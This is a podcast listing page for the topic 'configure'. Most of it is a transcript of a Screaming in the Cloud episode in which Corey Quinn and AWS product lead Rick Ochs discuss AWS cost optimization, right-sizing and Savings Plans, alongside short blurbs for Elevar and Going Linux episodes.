Podcasts about configure

  • 173 podcasts
  • 411 episodes
  • 26m average duration
  • 1 episode every other week
  • Latest: Dec 15, 2022


Latest podcast episodes about configure

Conversion Tracking Playbook
How To Configure & Extract Insights From Your Data Stack with Andrew Campbell @ OpenStore
Dec 15, 2022 · 36:01


Brad Redding and Jon Cairo from Elevar host special guest Andrew Campbell, Head of Data Science at OpenStore, to dive deep into data warehouse use cases and tips to get started, competitive advantages to maintaining your own data warehouse, how OpenStore operates their data stack to extract insights, why the iOS14 release and potential impact may have been a crutch for some, and how OpenStore approaches valuations when acquiring D2C brands -- what metrics matter.

We release new episodes every week that go deep into the world of tracking, analytics, and conversion optimization. Be sure to subscribe so you never miss an episode.

Links from episode:
- Open.Store
- FiveTran
- Andrew Campbell (LinkedIn)

And if you're new to Elevar, Elevar automates server-side conversion tracking for Shopify. Check us out!

Going Linux
Going Linux #433 · Run Ubuntu MATE On A 2-in-1 Convertible Laptop
Dec 2, 2022 · 17:34


My Lenovo Flex 5i is a 2-in-1 laptop with the ability to use the touch screen with a finger or an included stylus on the screen. Ubuntu MATE provides support for touch screens by default. I did have to make some adjustments to the stylus/screen mapping when using the stylus. In this episode I describe those adjustments and link to our article that describes some optional additional setup steps that make it more convenient to use the laptop in tablet mode.

Episode Time Stamps
00:00 Going Linux #433 · Run Ubuntu MATE On A 2-in-1 Convertible Laptop
01:00 5 Steps To Configure The Lenovo IdeaPad Flex 5i With Its Stylus Using Ubuntu MATE
03:36 How to map the stylus correctly for different screen orientations
04:14 1. Determine the names of the touch-enabled hardware
05:37 2. Determine the coordinate map for each device
08:05 3. Create on-screen buttons
09:47 4. Create the panel buttons
12:21 5. Enable the on-screen keyboard
14:15 Bonus step: Configure the stylus hardware buttons
16:34 goinglinux.com, goinglinux@gmail.com, +1-904-468-7889, @goinglinux, feedback, listen, subscribe
17:34 End

Screaming in the Cloud
The Complexities of AWS Cost Optimization with Rick Ochs
Dec 1, 2022 · 46:56


About RickRick is the Product Leader of the AWS Optimization team. He previously led the cloud optimization product organization at Turbonomic, and previously was the Microsoft Azure Resource Optimization program owner.Links Referenced: AWS: https://console.aws.amazon.com LinkedIn: https://www.linkedin.com/in/rick-ochs-06469833/ Twitter: https://twitter.com/rickyo1138 TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: This episode is sponsored in part by our friends at Chronosphere. Tired of observability costs going up every year without getting additional value? Or being locked in to a vendor due to proprietary data collection, querying and visualization? Modern day, containerized environments require a new kind of observability technology that accounts for the massive increase in scale and attendant cost of data. With Chronosphere, choose where and how your data is routed and stored, query it easily, and get better context and control. 100% open source compatibility means that no matter what your setup is, they can help. Learn how Chronosphere provides complete and real-time insight into ECS, EKS, and your microservices, whereever they may be at snark.cloud/chronosphere That's snark.cloud/chronosphere Corey: This episode is bought to you in part by our friends at Veeam. Do you care about backups? Of course you don't. Nobody cares about backups. Stop lying to yourselves! You care about restores, usually right after you didn't care enough about backups.  
If you're tired of the vulnerabilities, costs and slow recoveries when using snapshots to restore your data, assuming you even have them at all living in AWS-land, there is an alternative for you. Check out Veeam, thats V-E-E-A-M for secure, zero-fuss AWS backup that won't leave you high and dry when it's time to restore. Stop taking chances with your data. Talk to Veeam. My thanks to them for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. For those of you who've been listening to this show for a while, the theme has probably emerged, and that is that one of the key values of this show is to give the guest a chance to tell their story. It doesn't beat the guests up about how they approach things, it doesn't call them out for being completely wrong on things because honestly, I'm pretty good at choosing guests, and I don't bring people on that are, you know, walking trash fires. And that is certainly not a concern for this episode.But this might devolve into a screaming loud argument, despite my best effort. Today, I'm joined by Rick Ochs, Principal Product Manager at AWS. Rick, thank you for coming back on the show. The last time we spoke, you were not here you were at, I believe it was Turbonomic.Rick: Yeah, that's right. Thanks for having me on the show, Corey. I'm really excited to talk to you about optimization and my current role and what we're doing.Corey: Well, let's start at the beginning. Principal product manager. It sounds like one of those corporate titles that can mean a different thing in every company or every team that you're talking to. What is your area of responsibility? Where do you start and where do you stop?Rick: Awesome. So, I am the product manager lead for all of AWS Optimizations Team. So, I lead the product team. 
That includes several other product managers that focus in on Compute Optimizer, Cost Explorer, right-sizing recommendations, as well as Reservation and Savings Plan purchase recommendations.Corey: In other words, you are the person who effectively oversees all of the AWS cost optimization tooling and approaches to same?Rick: Yeah.Corey: Give or take. I mean, you could argue that oh, every team winds up focusing on helping customers save money. I could fight that argument just as effectively. But you effectively start and stop with respect to helping customers save money or understand where the money is going on their AWS bill.Rick: I think that's a fair statement. And I also agree with your comment that I think a lot of service teams do think through those use cases and provide capabilities, you know? There's, like, S3 storage lines. You know, there's all sorts of other products that do offer optimization capabilities as well, but as far as, like, the unified purpose of my team, it is, unilaterally focused on how do we help customers safely reduce their spend and not hurt their business at the same time.Corey: Safely being the key word. For those who are unaware of my day job, I am a partial owner of The Duckbill Group, a consultancy where we fix exactly one problem: the horrifying AWS bill. This is all that I've been doing for the last six years, so I have some opinions on AWS bill reduction as well. So, this is going to be a fun episode for the two of us to wind up, mmm, more or less smacking each other around, but politely because we are both professionals. So, let's start with a very high level. How does AWS think about AWS bills from a customer perspective? You talk about optimizing it, but what does that mean to you?Rick: Yeah. So, I mean, there's a lot of ways to think about it, especially depending on who I'm talking to, you know, where they sit in our organization. I would say I think about optimization in four major themes. 
The first is how do you scale correctly, whether that's right-sizing or architecting things to scale in and out? The second thing I would say is, how do you do pricing and discounting, whether that's Reservation management, Savings Plan Management, coverage, how do you handle the expenditures of prepayments and things like that?Then I would say suspension. What that means is turn the lights off when you leave the room. We have a lot of customers that do this and I think there's a lot of opportunity for more. Turning EC2 instances off when they're not needed if they're non-production workloads or other, sort of, stateful services that charge by the hour, I think there's a lot of opportunity there.And then the last of the four methods is clean up. And I think it's maybe one of the lowest-hanging fruit, but essentially, are you done using this thing? Delete it. And there's a whole opportunity of cleaning up, you know, IP addresses unattached EBS volumes, sort of, these resources that hang around in AWS accounts that sort of getting lost and forgotten as well. So, those are the four kind of major thematic strategies for how to optimize a cloud environment that we think about and spend a lot of time working on.Corey: I feel like there's—or at least the way that I approach these things—that there are a number of different levels you can look at AWS billing constructs on. The way that I tend to structure most of my engagements when I'm working with clients is we come in and, step one: cool. Why do you care about the AWS bill? It's a weird question to ask because most of the engineering folks look at me like I've just grown a second head. Like, “So, why do you care about your AWS bill?” Like, “What? Why do you? You run a company doing this?”It's no, no, no, it's not that I'm being rhetorical and I don't—I'm trying to be clever somehow and pretend that I don't understand all the nuances around this, but why does your business care about lowering the AWS bill? 
Because very often, the answer is they kind of don't. What they care about from a business perspective is being able to accurately attribute costs for the service or good that they provide, being able to predict what that spend is going to be, and also yes, a sense of being good stewards of the money that has been entrusted to them by via investors, public markets, or the budget allocation process of their companies and make sure that they're not doing foolish things with it. And that makes an awful lot of sense. It is rare at the corporate level that the stated number one concern is make the bills lower.Because at that point, well, easy enough. Let's just turn off everything you're running in production. You'll save a lot of money in your AWS bill. You won't be in business anymore, but you'll be saving a lot of money on the AWS bill. The answer is always deceptively nuanced and complicated.At least, that's how I see it. Let's also be clear that I talk with a relatively narrow subset of the AWS customer totality. The things that I do are very much intentionally things that do not scale. Definitionally, everything that you do has to scale. How do you wind up approaching this in ways that will work for customers spending billions versus independent learners who are paying for this out of their own personal pocket?Rick: It's not easy [laugh], let me just preface that. The team we have is incredible and we spent so much time thinking about scale and the different personas that engage with our products and how they're—what their experience is when they interact with a bill or AWS platform at large. There's also a couple of different personas here, right? 
We have a persona that focuses in on that cloud cost, the cloud bill, the finance, whether that's—if an organization is created a FinOps organization, if they have a Cloud Center of Excellence, versus an engineering team that maybe has started to go towards decentralized IT and has some accountability for the spend that they attribute to their AWS bill. And so, these different personas interact with us in really different ways, where Cost Explorer downloading the CUR and taking a look at the bill.And one thing that I always kind of imagine is somebody putting a headlamp on and going into the caves in the depths of their AWS bill and kind of like spelunking through their bill sometimes, right? And so, you have these FinOps folks and billing people that are deeply interested in making sure that the spend they do have meets their business goals, meaning this is providing high value to our company, it's providing high value to our customers, and we're spending on the right things, we're spending the right amount on the right things. Versus the engineering organization that's like, “Hey, how do we configure these resources? What types of instances should we be focused on using? What services should we be building on top of that maybe are more flexible for our business needs?”And so, there's really, like, two major personas that I spend a lot of time—our organization spends a lot of time wrapping our heads around. Because they're really different, very different approaches to how we think about cost. Because you're right, if you just wanted to lower your AWS bill, it's really easy. Just size everything to a t2.nano and you're done and move on [laugh], right? But you're [crosstalk 00:08:53]—Corey: Aw, t3 or t4.nano, depending upon whether regional availability is going to save you less. I'm still better at this. Let's not kid ourselves I kid. Mostly.Rick: For sure. So t4.nano, absolutely.Corey: T4g. 
Remember, now the way forward is everything has an explicit letter designator to define which processor company made the CPU that underpins the instance itself because that's a level of abstraction we certainly wouldn't want the cloud provider to take away from us any.Rick: Absolutely. And actually, the performance differences of those different processor models can be pretty incredible [laugh]. So, there's huge decisions behind all of that as well.Corey: Oh, yeah. There's so many factors that factor in all these things. It's gotten to a point of you see this usually with lawyers and very senior engineers, but the answer to almost everything is, “It depends.” There are always going to be edge cases. Easy example of, if you check a box and enable an S3 Gateway endpoint inside of a private subnet, suddenly, you're not passing traffic through a 4.5 cent per gigabyte managed NAT Gateway; it's being sent over that endpoint for no additional cost whatsoever.Check the box, save a bunch of money. But there are scenarios where you don't want to do it, so always double-checking and talking to customers about this is critically important. Just because, the first time you make a recommendation that does not work for their constraints, you lose trust. And make a few of those and it looks like you're more or less just making naive recommendations that don't add any value, and they learn to ignore you. So, down the road, when you make a really high-value, great recommendation for them, they stop paying attention.Rick: Absolutely. And we have that really high bar for recommendation accuracy, especially with right sizing, that's such a key one. Although I guess Savings Plan purchase recommendations can be critical as well. If a customer over commits on the amount of Savings Plan purchase they need to make, right, that's a really big problem for them.So, recommendation accuracy must be above reproach. 
Essentially, if a customer takes a recommendation and it breaks an application, they're probably never going to take another right-sizing recommendation again [laugh]. And so, this bar of trust must be exceptionally high. That's also why out of the box, the compute optimizer recommendations can be a little bit mild, they're a little time because the first order of business is do no harm; focus on the performance requirements of the application first because we have to make sure that the reason you build these workloads in AWS is served.Now ideally, we do that without overspending and without overprovisioning the capacity of these workloads, right? And so, for example, like if we make these right-sizing recommendations from Compute Optimizer, we're taking a look at the utilization of CPU, memory, disk, network, throughput, iops, and we're vending these recommendations to customers. And when you take that recommendation, you must still have great application performance for your business to be served, right? It's such a crucial part of how we optimize and run long-term. Because optimization is not a one-time Band-Aid; it's an ongoing behavior, so it's really critical that for that accuracy to be exceptionally high so we can build business process on top of it as well.Corey: Let me ask you this. How do you contextualize what the right approach to optimization is? What is your entire—there are certain tools that you have… by ‘you,' I mean, of course, as an organization—have repeatedly gone back to and different approaches that don't seem to deviate all that much from year to year, and customer to customer. How do you think about the general things that apply universally?Rick: So, we know that EC2 is a very popular service for us. We know that sizing EC2 is difficult. We think about that optimization pillar of scaling. It's an obvious area for us to help customers. 
We run into this sort of industry-wide experience where whenever somebody picks the size of a resource, they're going to pick one generally larger than they need.It's almost like asking a new employee at your company, “Hey, pick your laptop. We have a 16 gig model or a 32 gig model. Which one do you want?” That person [laugh] making the decision on capacity, hardware capacity, they're always going to pick the 32 gig model laptop, right? And so, we have this sort of human nature in IT of, we don't want to get called at two in the morning for performance issues, we don't want our apps to fall over, we want them to run really well, so we're going to size things very conservatively and we're going to oversize things.So, we can help customers by providing those recommendations to say, you can size things up in a different way using math and analytics based on the utilization patterns, and we can provide and pick different instance types. There's hundreds and hundreds of instance types in all of these regions across the globe. How do you know which is the right one for every single resource you have? It's a very, very hard problem to solve and it's not something that is lucrative to solve one by one if you have 100 EC2 instances. Trying to pick the correct size for each and every one can take hours and hours of IT engineering resources to look at utilization graphs, look at all of these types available, look at what is the performance difference between processor models and providers of those processors, is there application compatibility constraints that I have to consider? The complexity is astronomical.And then not only that, as soon as you make that sizing decision, one week later, it's out of date and you need a different size. So, [laugh] you didn't really solve the problem. 
So, we have to programmatically use data science and math to say, “Based on these utilization values, these are the sizes that would make sense for your business, that would have the lowest cost and the highest performance together at the same time.” And it's super important that we provide this capability from a technology standpoint because it would cost so much money to try to solve that problem that the savings you would achieve might not be meaningful. Then at the same time… you know, that's really from an engineering perspective, but when we talk to the FinOps and the finance folks, the conversations are more about Reservations and Savings Plans.How do we correctly apply Savings Plans and Reservations across a high percentage of our portfolio to reduce the costs on those workloads, but not so much that dynamic capacity levels in our organization mean we all of a sudden have a bunch of unused Reservations or Savings Plans? And so, a lot of organizations that engage with us and we have conversations with, we start with the Reservation and Savings Plan conversation because it's much easier to click a few buttons and buy a Savings Plan than to go institute an entire right-sizing campaign across multiple engineering teams. That can be very difficult, a much higher bar. So, some companies are ready to dive into the engineering task of sizing; some are not there yet. And they're a little maybe a little earlier in their FinOps journey, or the building optimization technology stacks, or achieving higher value out of their cloud environments, so starting with kind of the low hanging fruit, it can vary depending on the company, size of company, technical aptitudes, skill sets, all sorts of things like that.And so, those finance-focused teams are definitely spending more time looking at and studying what are the best practices for purchasing Savings Plans, covering my environment, getting the most out of my dollar that way. 
Then they don't have to engage the engineering teams; they can kind of take a nice chunk off the top of their bill and sort of have something to show for that amount of effort. So, there's a lot of different approaches to start in optimization.Corey: My philosophy runs somewhat counter to this because everything you're saying does work globally, it's safe, it's non-threatening, and then also really, on some level, feels like it is an approach that can be driven forward by finance or business. Whereas my worldview is that cost and architecture in cloud are one and the same. And there are architectural consequences of cost decisions and vice versa that can be adjusted and addressed. Like, one of my favorite party tricks—although I admit, it's a weird party—is I can look at the exploded PDF view of a customer's AWS bill and describe their architecture to them. And people have questioned that a few times, and now I have a testimonial on my client website that mentions, “It was weird how he was able to do this.”Yeah, it's real, I can do it. And it's not a skill, I would recommend cultivating for most people. But it does also mean that I think I'm onto something here, where there's always context that needs to be applied. It feels like there's an entire ecosystem of product companies out there trying to build what amount to a better Cost Explorer that also is not free the way that Cost Explorer is. So, the challenge I see there's they all tend to look more or less the same; there is very little differentiation in that space. And in the fullness of time, Cost Explorer does—ideally—get better. How do you think about it?Rick: Absolutely. If you're looking at ways to understand your bill, there's obviously Cost Explorer, the CUR, that's a very common approach is to take the CUR and put a BI front-end on top of it. That's a common experience. 
A lot of companies that have chops in that space will do that themselves instead of purchasing a third-party product that does do bill breakdown and dissemination. There's also the cross-charge show-back organizational breakdown and boundaries because you have these super large organizations that have fiefdoms.You know, if HR IT and sales IT, and [laugh] you know, product IT, you have all these different IT departments that are fiefdoms within your AWS bill and construct, whether they have different ABS accounts or say different AWS organizations sometimes, right, it can get extremely complicated. And some organizations require the ability to break down their bill based on those organizational boundaries. Maybe tagging works, maybe it doesn't. Maybe they do that by using a third-party product that lets them set custom scopes on their resources based on organizational boundaries. That's a common approach as well.We do also have our first-party solutions, they can do that, like the CUDOS dashboard as well. That's something that's really popular and highly used across our customer base. It allows you to have kind of a dashboard and customizable view of your AWS costs and, kind of, split it up based on tag organizational value, account name, and things like that as well. So, you mentioned that you feel like the architectural and cost problem is the same problem. I really don't disagree with that at all.I think what it comes down to is some organizations are prepared to tackle the architectural elements of cost and some are not. And it really comes down to how does the customer view their bill? Is it somebody in the finance organization looking at the bill? Is it somebody in the engineering organization looking at the bill? Ideally, it would be both.Ideally, you would have some of those skill sets that overlap, or you would have an organization that does focus in on FinOps or cloud operations as it relates to cost. 
But then at the same time, there are organizations that are like, “Hey, we need to go to cloud. Our CIO told us go to cloud. We don't want to pay the lease renewal on this building.” There's a lot of reasons why customers move to cloud, a lot of great reasons, right? Three major reasons you move to cloud: agility, [crosstalk 00:20:11]—Corey: And several terrible ones.Rick: Yeah, [laugh] and some not-so-great ones, too. So, there's so many different dynamics that get exposed when customers engage with us that they might or might not be ready to engage on the architectural element of how to build hyperscale systems. So, many of these customers are bringing legacy workloads and applications to the cloud, and something like a re-architecture to use stateless resources or something like Spot, that's just not possible for them. So, how can they take 20% off the top of their bill? Savings Plans or Reservations are kind of that easy, low-hanging fruit answer to just say, “We know these are fairly static environments that don't change a whole lot, that are going to exist for some amount of time.”They're legacy, you know, we can't turn them off. It doesn't make sense to rewrite these applications because they just don't change, they don't have high business value, or something like that. And so, the architecture part of that conversation doesn't always come into play. Should it? Yes.The long-term maturity and approach for cloud optimization does absolutely account for architecture, thinking strategically about how you do scaling, what services you're using, are you going down the Kubernetes path, which I know you're going to laugh about, but you know, how do you take these applications and componentize them? What services are you using to do that? How do you get that long-term scale and manageability out of those environments? Like you said at the beginning, the complexity is staggering and there's no one unified answer. 
That's why there's so many different entrance paths into, “How do I optimize my AWS bill?”There's no one answer, and every customer I talk to has a different comfort level and appetite. And some of them have tried suspension, some of them have gone heavy down Savings Plans, some of them want to dabble in right-sizing. So, every customer is different and we want to provide those capabilities for all of those different customers that have different appetites or comfort levels with each of these approaches.Corey: This episode is sponsored in part by our friends at Redis, the company behind the incredibly popular open source database. If you're tired of managing open source Redis on your own, or if you are looking to go beyond just caching and unlocking your data's full potential, these folks have you covered. Redis Enterprise is the go-to managed Redis service that allows you to reimagine how your geo-distributed applications process, deliver, and store data. To learn more from the experts in Redis how to be real-time, right now, from anywhere, visit redis.com/duckbill. That's R - E - D - I - S dot com slash duckbill.Corey: And I think that's very fair. I think that it is not necessarily a bad thing that you wind up presenting a lot of these options to customers. But there are some rough edges. An example of this is something I encountered myself somewhat recently and put on Twitter—because I have those kinds of problems—where originally, I remember this, that you were able to buy hourly Savings Plans, which again, Savings Plans are great; no knock there. I would wish that they applied to more services rather than, “Oh, SageMaker is going to do its own Savings Pla”—no, stop keeping me from going from something where I have to manage myself on EC2 to something you manage for me and making that cost money. You nailed it with Fargate. You nailed it with Lambda. Please just have one unified Savings Plan thing. 
But I digress.But you had a limit, once upon a time, of $1,000 per hour. Now, it's $5,000 per hour, which I believe in a three-year all-up-front means you will cheerfully add $130 million purchase to your shopping cart. And I kept adding a bunch of them and then had a little over a billion dollars a single button click away from being charged to my account. Let me begin with what's up with that?Rick: [laugh]. Thank you for the tweet, by the way, Corey.Corey: Always thrilled to ruin your month, Rick. You know that.Rick: Yeah. Fantastic. We took that tweet—you know, it was tongue in cheek, but also it was a serious opportunity for us to ask a question of what does happen? And it's something we did ask internally and have some fun conversations about. I can tell you that if you clicked purchase, it would have been declined [laugh]. So, you would have not been—Corey: Yeah, American Express would have had a problem with that. But the question is, would you have attempted to charge American Express, or would something internally have gone, “This has a few too many commas for us to wind up presenting it to the card issuer with a straight face?”Rick: [laugh]. Right. So, it wouldn't have gone through and I can tell you that, you know, if your account was on a PO-based configuration, you know, it would have gone to the account team. And it would have gone through our standard process for having a conversation with our customer there. That being said, we are—it's an awesome opportunity for us to examine what is that shopping cart experience.We did increase the limit, you're right. And we increased the limit for a lot of reasons that we sat down and worked through, but at the same time, there's always an opportunity for improvement of our product and experience, we want to make sure that it's really easy and lightweight to use our products, especially purchasing Savings Plans. 
Savings Plans are already kind of wrought with mental concern and risk of purchasing something so expensive and large that has a big impact on your AWS bill, so we don't really want to add any more friction necessarily the process but we do want to build an awareness and make sure customers understand, “Hey, you're purchasing this. This has a pretty big impact.” And so, we're also looking at other ways we can kind of improve the ability for the Savings Plan shopping cart experience to ensure customers don't put themselves in a position where you have to unwind or make phone calls and say, “Oops.” Right? We [laugh] want to avoid those sorts of situations for our customers. So, we are looking at quite a few additional improvements to that experience as well that I'm really excited about that I really can't share here, but stay tuned.Corey: I am looking forward to it. I will say the counterpoint to that is having worked with customers who do make large eight-figure purchases at once, there's a psychology element that plays into it. Everyone is very scared to click the button on the ‘Buy It Now' thing or the ‘Approve It.' So, what I've often found is at that scale, one, you can reduce what you're buying by half of it, and then see how that treats you and then continue to iterate forward rather than doing it all at once, or reach out to your account team and have them orchestrate the buy. In previous engagements, I had a customer do this religiously and at one point, the concierge team bought the wrong thing in the wrong region, and from my perspective, I would much rather have AWS apologize for that and fix it on their end, than from us having to go with a customer side of, “Oh crap, oh, crap. Please be nice to us.”Not that I doubt you would do it, but that's not the nervous conversation I want to have in quite the same way. It just seems odd to me that someone would want to make that scale of purchase without ever talking to a human. I mean, I get it. 
I'm as antisocial as they come some days, but for that kind of money, I kind of just want another human being to validate that I'm not making a giant mistake.

Rick: We love that. That's such a tremendous opportunity for us to engage and discuss with an organization that's going to make a large commitment, that here's the impact, here's how we can help. How does it align to our strategy? We also do recommend, from a strategic perspective, those more incremental purchases. I think it creates a better experience long-term when you don't have a single Savings Plan that's going to expire on a specific day that all of a sudden increases your entire bill by a significant percentage.

So, making staggered monthly purchases makes a lot of sense. And it also works better for incremental growth, right? If your organization is growing 5% month-over-month or year-over-year or something like that, you can purchase those incremental Savings Plans that sort of stack up on top of each other and then you don't have that risk of a cliff one day where one super-large SP expires and boom, you have to scramble and repurchase within minutes because every minute that goes by is an additional expense, right? That's not a great experience. And so that's, really, a large part of why those staggered purchase experiences make a lot of sense.

That being said, a lot of companies do their math and their finance in different ways. And single large purchases makes sense to go through their process and their rigor as well. So, we try to support both types of purchasing patterns.

Corey: I think that is an underappreciated aspect of cloud cost savings and cloud cost optimization, where it is much more about humans than it is about math.
I see this most notably when I'm helping customers negotiate their AWS contracts with AWS, where there are often perspectives such as, “Well, we feel like we really got screwed over last time, so we want to stick it to them and make them give us a bigger percentage discount on something.” And it's like, look, you can do that, but I would much rather, if it were me, go for something that moves the needle on your actual business and empowers you to move faster, more effectively, and lead to an outcome that is a positive for everyone versus the well, we're just going to be difficult in this one point because they were difficult on something last time. But ego is a thing. Human psychology is never going to have an API for it. And again, customers get to decide their own destiny in some cases.

Rick: I completely agree. I've actually experienced that. So, this is the third company I've been working at on Cloud optimization. I spent several years at Microsoft running an optimization program. I went to Turbonomic for several years, building out the right-sizing and savings plan reservation purchase capabilities there, and now here at AWS.

And through all of these journeys and experiences working with companies to help optimize their cloud spend, I can tell you that the psychological needle—moving the needle is significantly harder than the technology stack of sizing something correctly or deleting something that's unused. We can solve the technology part. We can build great products that identify opportunities to save money. There's still this psychological component of IT, for the last several decades has gone through this maturity curve of if it's not broken, don't touch it. Five-nines, six sigma, all of these methods of IT sort of rationalizing do no harm, don't touch anything, everything must be up.

And it even kind of goes back several decades. Back when if you rebooted a physical server, the motherboard capacitors would pop, right?
So, there's even this anti—or this stigma against even rebooting servers sometimes. The cloud really does away with a lot of that stuff because we have live migration and we have all of these, sort of, stateless designs and capabilities, but we still carry along with us this mentality of don't touch it; it might fall over. And we have to really get past that.

And that means that the trust, we went back to the trust conversation where we talk about the recommendations must be incredibly accurate. You're risking your job, in some cases; if you are a DevOps engineer, and your commitments on your yearly goals are uptime, latency, response time, load time, these sorts of things, these operational metrics, KPIs that you use, you don't want to take a downsized recommendation. It has a severe risk of harming your job and your bonus.

Corey: “These instances are idle. Turn them off.” It's like, yeah, these instances are the backup site, or the DR environment, or—

Rick: Exactly.

Corey: —something that takes very bursty but occasional traffic. And yeah, I know it costs us some money, but here's the revenue figures for having that thing available. Like, “Oh, yeah. Maybe we should shut up and not make dumb recommendations around things,” is the human response, but computers don't have that context.

Rick: Absolutely. And so, the accuracy and trust component has to be the highest bar we meet for any optimization activity or behavior. We have to circumvent or supersede the human aversion, the risk aversion, that IT is built on, right?

Corey: Oh, absolutely. And let's be clear, we see this all the time where I'm talking to customers and they have been burned before because we tried to save money and then we took a production outage as a side effect of a change that we made, and now we're not allowed to try to save money anymore.
And there's a hidden truth in there, which is auto-scaling is something that a lot of customers talk about, but very few have instrumented true auto-scaling because they interpret it as we can scale up to meet demand. Because yeah, if you don't do that you're dropping customers on the floor.

Well, what about scaling back down again? And the answer there is like, yeah, that's not really a priority because it's just money. We're not disappointing customers, causing brand reputation, and we're still able to take people's money when that happens. It's only money; we can fix it later. Covid shined a real light on a lot of the stuff just because there are customers that we've spoken to who's—their user traffic dropped off a cliff, infrastructure spend remained constant day over day.

And yeah, they believe, genuinely, they were auto-scaling. The most interesting lies are the ones that customers tell themselves, but the bill speaks. So, getting a lot of modernization traction from things like that was really neat to watch. But customers I don't think necessarily intuitively understand most aspects of their bill because it is a multidisciplinary problem. It's engineering, it's finance, it's accounting—which is not the same thing as finance—and you need all three of those constituencies to be able to communicate effectively using a shared and common language. It feels like we're marriage counseling between engineering and finance, most weeks.

Rick: Absolutely, we are. And it's important we get it right, that the data is accurate, that the recommendations we provide are trustworthy. If the finance team gets their hands on the savings potential they see out of right-sizing, takes it to engineering, and then engineering comes back and says, “No, no, no, we can't actually do that. We can't actually size those,” right, we have problems. And they're cultural, they're transformational.
Organizations' appetite for these things varies greatly and so it's important that we address that problem from all of those angles. And it's not easy to do.

Corey: How big do you find the optimization problem is when you talk to customers? How focused are they on it? I have my answers, but that's the scale of anec-data. I want to hear your actual answer.

Rick: Yeah. So, we talk with a lot of customers that are very interested in optimization. And we're very interested in helping them on the journey towards having an optimal estate. There are so many nuances and barriers, most of them psychological like we already talked about.

I think there's this opportunity for us to go do better exposing the potential of what an optimal AWS estate would look like from a dollar and savings perspective. And so, I think it's kind of not well understood. I think it's one of the biggest areas or barriers of companies really attacking the optimization problem with more vigor is if they knew that the potential savings they could achieve out of their AWS environment would really align their spend much more closely with the business value they get, I think everybody would go bonkers. And so, I'm really excited about us making progress on exposing that capability or the total savings potential and amount. It's something we're looking into doing in a much more obvious way.

And we're really excited about customers doing that on AWS where they know they can trust AWS to get the best value for their cloud spend, that it's a long-term good bet because their resources that they're using on AWS are all focused on giving business value. And that's the whole key. How can we align the dollars to the business value, right? And I think optimization is that connection between those two concepts.

Corey: Companies are generally not going to greenlight a project whose sole job is to save money unless there's something very urgent going on.
What will happen is as they iterate forward on the next generation of services or a migration of a service from one thing to another, they will make design decisions that benefit those optimizations. There's low-hanging fruit we can find, usually of the form, “Turn that thing off,” or, “Configure this thing slightly differently,” that doesn't take a lot of engineering effort in place. But, on some level, it is not worth the engineering effort it takes to do an optimization project. We've all met those engineers—speaking as one of them myself—who, left to our own devices, will spend two months just knocking a few hundred bucks a month off of our AWS developer environment.

We steal more than office supplies. I'm not entirely sure what the business value of doing that is, in most cases. For me, yes, okay, things that work in small environments work very well in large environments, generally speaking, so I learned how to save 80 cents here and that's a few million bucks a month somewhere else. Most folks don't have that benefit happening, so it's a question of meeting them where they are.

Rick: Absolutely. And I think the scale component is huge, which you just touched on. When you're talking about a hundred EC2 instances versus a thousand, optimization becomes kind of a different component of how you manage that AWS environment. And while single-decision recommendations to scale an individual server, the dollar amount might be different, the percentages are just about the same when you look at what is it to be sized correctly, what is it to be configured correctly? And so, it really does come down to priority.

And so, it's really important to really support all of those companies of all different sizes and industries because they will have different experiences on AWS. And some will have more sensitivity to cost than others, but all of them want to get great business value out of their AWS spend.
And so, as long as we're meeting that need and we're supporting our customers to make sure they understand the commitment we have to ensuring that their AWS spend is valuable, it is meaningful, right, they're not spending money on things that are not adding value, that's really important to us.

Corey: I do want to have as the last topic of discussion here, how AWS views optimization, where there have been a number of repeated statements where helping customers optimize their cloud spend is extremely important to us. And I'm trying to figure out where that falls on the spectrum from, “It's the thing we say because they make us say it, but no, we're here to milk them like cows,” all the way on over to, “No, no, we passionately believe in this at every level, top to bottom, in every company. We are just bad at it.” So, I'm trying to understand how that winds up being expressed from your lived experience having solved this problem first outside, and then inside.

Rick: Yeah. So, it's kind of like part of my personal story. It's the main reason I joined AWS. And, you know, when you go through the interview loops and you talk to the leaders of an organization you're thinking about joining, they always stop at the end of the interview and ask, “Do you have any questions for us?” And I asked that question to pretty much every single person I interviewed with. Like, “What is AWS's appetite for helping customers save money?”

Because, like, from a business perspective, it kind of is a little bit wonky, right? But the answers were varied, and all of them were customer-obsessed and passionate. And I got this sense that my personal passion for helping companies have better efficiency of their IT resources was an absolute primary goal of AWS and a big element of Amazon's leadership principle, be customer obsessed.
Now, I'm not a spokesperson, so [laugh] we'll see, but we are deeply interested in making sure our customers have a great long-term experience and a high-trust relationship. And so, when I asked these questions in these interviews, the answers were all about, “We have to do the right thing for the customer. It's imperative. It's also in our DNA. It's one of the most important leadership principles we have to be customer-obsessed.”

And it is the primary reason why I joined: because of that answer to that question. Because it's so important that we achieve a better efficiency for our IT resources, not just for, like, AWS, but for our planet. If we can reduce consumption patterns and usage across the planet for how we use data centers and all the power that goes into them, we can talk about meaningful reductions of greenhouse gas emissions, the cost and energy needed to run IT business applications, and not only that, but most all new technology that's developed in the world seems to come out of a data center these days, we have a real opportunity to make a material impact to how much resource we use to build and use these things. And I think we owe it to the planet, to humanity, and I think Amazon takes that really seriously. And I'm really excited to be here because of that.

Corey: As I recall—and feel free to make sure that this comment never sees the light of day—you asked me before interviewing for the role and then deciding to accept it, what I thought about you working there and whether I would recommend it, whether I wouldn't. And I think my answer was fairly nuanced. And you're working there now and we still are on speaking terms, so people can probably guess what my comments took the shape of, generally speaking. So, I'm going to have to ask now; it's been, what, a year since you joined?

Rick: Almost. I think it's been about eight months.

Corey: Time during a pandemic is always strange. But I have to ask, did I steer you wrong?

Rick: No. Definitely not.
I'm very happy to be here. The opportunity to help such a broad range of companies get more value out of technology—and it's not just cost, right, like we talked about. It's actually not about the dollar number going down on a bill. It's about getting more value and moving the needle on how do we efficiently use technology to solve business needs.

And that's been my career goal for a really long time, I've been working on optimization for, like, seven or eight, I don't know, maybe even nine years now. And it's like this strange passion for me, this combination of my dad taught me how to be a really good steward of money and a great budget manager, and then my passion for technology. So, it's this really cool combination of, like, childhood life skills that really came together for me to create a career that I'm really passionate about. And this move to AWS has been such a tremendous way to supercharge my ability to scale my personal mission, and really align it to AWS's broader mission of helping companies achieve more with cloud platforms, right?

